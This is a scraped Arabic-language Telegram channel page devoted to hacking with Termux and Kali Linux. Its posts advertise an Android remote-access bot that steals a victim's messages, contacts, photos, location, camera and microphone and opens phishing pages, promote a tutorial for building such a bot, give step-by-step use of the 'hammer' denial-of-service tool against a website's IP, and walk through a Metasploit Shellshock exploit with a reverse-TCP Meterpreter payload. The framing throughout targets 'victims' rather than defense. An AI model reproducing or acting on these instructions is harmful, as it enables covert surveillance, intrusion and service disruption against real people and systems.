Termux-Kali Linux

Description
محتوى القناة :
🔺 كالي - kali linux
🔺 تيرميكس - Termux
🔺 أمن سيبراني - Cyber Security
🔺 اختراق أجهزة أندرويد
🔺 اختراق المواقع والسيرفرات
🔺 اختراق الوايفاي
🔺 اختراق حسابات مواقع التواصل
🔺 البرامج الخبيثه
🔺 علم التشفير
🔺 برمجه
🔺 ثغرات
🔺 حماية
Advertising
We recommend to visit

قناة احمد علي على تيليجرام ( شروحات تقنية ، تطبيقات ، ‏أفلام ومسلسلات ، خلفيات ، و المزيد )

Last updated 1 week ago

يرمز تيليجرام إلى الحريّة والخصوصيّة ويحوي العديد من المزايا سهلة الاستخدام.

Last updated 3 months, 2 weeks ago

- بوت الإعلانات: 🔚 @FEFBOT -

- هناك طرق يجب ان تسلكها بمفردك لا اصدقاء، لا عائلة، ولا حتى شريك، فقط انت.

My Tragedy Lies With Those Things That Happen in One Second And Remain

- @NNEEN // 🔚: للأعلانات المدفوعة -

Last updated 6 days, 5 hours ago

4 months ago

السلام عليكم
اخباركم ي رجال.

4 months, 3 weeks ago

الميزات 🔰

🔦 تشغيل/إيقاف الشعلة
📱 تغيير الخلفية
ℹ️ معلومات الجهاز العميقة
📳 اهتزاز الجهاز
🗨 اعرض التوست
🎧 تشغيل الصوت
📋 استلام نص الحافظة الأخير

الميزات بإذن عادي 🎚️

✉️ استقبال جميع الرسائل القصيرة
✉️ إرسال رسالة نصية إلى أي رقم
✉️ إرسال رسائل نصية قصيرة مع الجهاز المستهدف إلى جميع جهات الاتصال الخاصة به
👤 استقبال جميع جهات الاتصال
📷 التقاط الكاميرا الرئيسية والأمامية
🎙 التقاط الميكروفون (مع مدة مخصصة)
👤 تلقي كافة سجلات المكالمات
🔔قارئ الإشعارات
🛰️ استلام موقع الجهاز
🔐 افتح أي صفحة تصيد في متصفحات الضحية المباشرة
📒 معرض الصور (احصل على جميع الصور المتوفرة في المعرض)
🔔 مرسل الإشعارات (إرسال إشعار مخصص يظهر على الجهاز المستهدف بنقرة زر مخصصة)

للتواصل⤵️

@king_1_4

🔰المصدر:
@Abu_Yamani

4 months, 3 weeks ago

السلام عليكم ورحمة الله وبركاته ❤️

🔰انشاء بوت اختراق بجميع المميزات تحكم كامل بهاتف الضحية

مهام البوت الذي يقدمها كتالي #⃣
1_ سحب معلومات الجهاز #⃣
2_ سحب اي صوره تريد  #⃣
3_سحب اي ملف  #⃣
4_ حذف اي ملف بهاتف  #⃣
5_ ارسال رسالة لأي رقم #⃣
6_ سحب جميع الرسائل #⃣
7_ تسجيل صوت بهاتف الضحيه #⃣
8_ استخدام الكاميرا الاماميه والخلفيه #⃣
9_ ارسال إشعار إلى هاتف الضحيه #⃣
10_ سحب موقع الضحيه #⃣
11_ سحب الحافظه با الكامل #⃣

والعديد من المميزات المذكوره في الشرح 📢
كل ما عليك هوا مشاهدة الشرح وستتمكن من أنشأ بوت اختراق الهاتف با الكامل

🔰المصدر
@Abu_Yamani

5 months, 3 weeks ago

............{استخدام اداة hammer }........

تم تشغيل الاداة
مثال لو نريد الهجوم على موقع googel.com
افتح نافذه جديده تسوي فيها هاذا الامر
ping googel.com
انتر بيضهر لك الايبي تبع الموقع مثل
PING googel.com (172.217.21.68) 56(84) bytes of data.
64 bytes from fra07s31-in-f68.1e100.net (172.217.21.68): icmp_seq=1 ttl=45 time=142 ms
64 bytes from fra07s31-in-f68.1e100.net (172.217.21.68): icmp_seq=2 ttl=45 time=171 ms
هنا بيضهر لك جميع ايبيات الموقع ننسخه ايبي من بين الاقواس ولنفترض الايبي
172.217.21.68
نرجع الصفحه الاوله نسوي
python3 hammer.py \-s [••••]
مكان [•••] هتحط الايبي موقع
انتر الحين يبدا الهجوم اذا ضهر معنا زي كذه يعني جاري الهجوم

[••••••] port: 80 turbo: 135
Please wait...
Thu Feb 28 13:58:25 2019 <--packet sent! hammering-->
Thu Feb 28 13:58:25 2019 <-

5 months, 4 weeks ago

Metasploit هي إطار عمل (Framework) قوي وشامل يستخدم في اختبار الاختراق واكتشاف الثغرات الأمنية في الأنظمة والشبكات. يستخدمه الخبراء في مجال الاختراق السيبراني لتقييم قوة الأنظمة وتحديد الثغرات المحتملة وتطوير استراتيجيات لتعزيز الأمان.

يوفر Metasploit العديد من الميزات والأدوات التي تساعد المختصين في الاختراق في تحقيق أهدافهم. وإليك بعض المفاهيم الرئيسية والمكونات المهمة لـ Metasploit:

  1. Exploits: هي مجموعة من الأكواد أو الثغرات المستغلة التي تستغل الثغرات الأمنية في البرامج أو النظم. يتضمن Metasploit مكتبة واسعة من الـ exploits التي يمكن استخدامها لاختراق الأنظمة المستهدفة.

  2. Payloads: هي الأكواد أو البرامج التي يتم تنفيذها بعد استغلال الثغرة. تستخدم للحصول على وصول وتحكم في النظام المستهدف. يوفر Metasploit مجموعة متنوعة من payloads تمكن المختصين من تنفيذ أنواع مختلفة من الهجمات واستغلال الأنظمة بشكل متقدم.

  3. Post-exploitation: بمجرد اختراق النظام المستهدف، يوفر Metasploit القدرة على تنفيذ إجراءات متقدمة ما بعد الاختراق. يمكن استخدامها لاستخراج المعلومات، وتسجيل الأحداث، والتحكم في الأجهزة المتصلة، والتحرك داخل الشبكة المستهدفة.

  4. Auxiliary Modules: تعتبر وحدات مساعدة توفر مجموعة من الوظائف المساعدة في الاختراق. من بين هذه الوحدات، يمكن استخدامها لجمع المعلومات، وفحص الشبكة، واختبار الثغرات الشائعة، وتنفيذ أدوات إدارة الشبكة.

  5. الاستغلال الاجتماعي (Social Engineering): يتضمن Metasploit أدوات ومكونات تساعد على تنفيذ هجمات الاستغلال الاجتماعي، مثل الهجمات عبر البريد الاحتيالي (Phishing) أو الاستعانة بالهندسة الاجتماعية للوصول إلى المعلومات الحساسة.

  6. إدارة الاختبارات (Testing Management): يوفر Metasploit واجهة سطر الأوامر وواجهة رسومية لإدارة وتنظيم عمليات الاختبار وتحليل النتائج. يمكن تخصيص الاختبارات وتكوينها وتسجيل التقارير ومشاركة البيانات بين فرق الاختبار.

  7. البحث عن ثغرات: يمكنك استخدام أداة البحث في Metasploit للعثور على ثغرات أمنية معروفة في أنظمة مختلفة. على سبيل المثال، إذا كنت ترغب في البحث عن ثغرات في نظام التشغيل Windows XP، يمكنك استخدام الأمر التالي:

msf> search Windows XP

ستعرض Metasploit قائمة بالثغرات المعروفة التي تنطبق على Windows XP.

  1. استخدام Exploit: بمجرد العثور على ثغرة ترغب في استغلالها، يمكنك استخدام Exploit المناسب. على سبيل المثال، إذا كنت ترغب في استغلال ثغرة معينة تؤثر على خدمة الويب Apache، يمكنك استخدام الأمر التالي:

msf> use exploit/multi/http/apache_mod_cgi_bash_env_exec
هذا الأمر يقوم بتحميل Exploit الخاص بثغرة Apache Mod_CGI Bash Environment Command Execution.

  1. تحديد Payload: بعد اختيار Exploit، يجب عليك تحديد Payload المناسب الذي سيتم تنفيذه بعد استغلال الثغرة. على سبيل المثال، يمكنك استخدام Payload الخاص بفتح جلسة Meterpreter المباشرة على النظام المستهدف:

msf exploit(apache_mod_cgi_bash_env_exec) > set payload linux/x86/meterpreter/reverse_tcp
4. تكوين الاستهداف والمعلومات اللازمة: يجب عليك تحديد المعلومات اللازمة لاختراق النظام المستهدف، مثل عنوان IP ومنفذ الاستماع. على سبيل المثال:

msf exploit(apache_mod_cgi_bash_env_exec) > set RHOST 192.168.0.100 msf exploit(apache_mod_cgi_bash_env_exec) > set LHOST 192.168.0.101 msf exploit(apache_mod_cgi_bash_env_exec) > set LPORT 4444
حيث يتم تحديد عنوان IP للنظام المستهدف وعنوان IP ومنفذ الاستماع الخاص بجهازك.

  1. تشغيل الاستغلال: بعد تكوين البيانات المطلوبة، يمكنك تشغيل الاستغلال ببساطة باستخدام الأمر التالي:

msf exploit(apache_mod_cgi_bash_env_exec) > exploit
إذا كانت الثغرة صالحة وتم استغلالها بنجاح، فسيتم إنشاء جلسة Meterpreter تسمح لك بتفحص والتحكم في النظام المستهدف.

8 months ago

https://youtu.be/hjG3qhY2t-E?si=9-vXuBX0fXxOIxPj

YouTube

فك حظر WhatsApp وداعا للحظر مرة ثاني 2024

السلام عليكم ورحمة الله طريقة فك حضر واتساب 2024: طريقة نارية وداعا للحضر مرة ثاني الثغرة نارية فكوو ارقامكم بس تفك علا رقم رقم عشان متوقف الثغرة شاهد الشرح كامل عشان تفهم الطريقة مو تاخذ الكود وتروح تفك مارح يشتغل معك شاهد الشرح تفهم. الكود الفك: بقناتي…

10 months, 1 week ago

**مساء الخير

اخواني بغيب لفترة وارجع ان شاء الله بواصل معاكم وتشوفو افضل الشروحات بإذن الله.

◇المسامحة منكم◇
◇اخوكم ابو غيث اليماني◇

اي واحد زعلته او شتمتة او سويت فيه شي المسامحة منة مابدي احد يكون فية حقد علي المسامحة من الكل °

اي واحد عندي له شي او عطيني مقابل عشان ثغره او اي شي وما عطيته تعال واتساب بعطيك الي بدك.**+967715124397

10 months, 2 weeks ago
10 months, 2 weeks ago

● لا تنسو الاشتراك بل قناه اليوتيوب:
● والإعجاب بل فيديو تشجيعا لنا:

We recommend to visit

قناة احمد علي على تيليجرام ( شروحات تقنية ، تطبيقات ، ‏أفلام ومسلسلات ، خلفيات ، و المزيد )

Last updated 1 week ago

يرمز تيليجرام إلى الحريّة والخصوصيّة ويحوي العديد من المزايا سهلة الاستخدام.

Last updated 3 months, 2 weeks ago

- بوت الإعلانات: 🔚 @FEFBOT -

- هناك طرق يجب ان تسلكها بمفردك لا اصدقاء، لا عائلة، ولا حتى شريك، فقط انت.

My Tragedy Lies With Those Things That Happen in One Second And Remain

- @NNEEN // 🔚: للأعلانات المدفوعة -

Last updated 6 days, 5 hours ago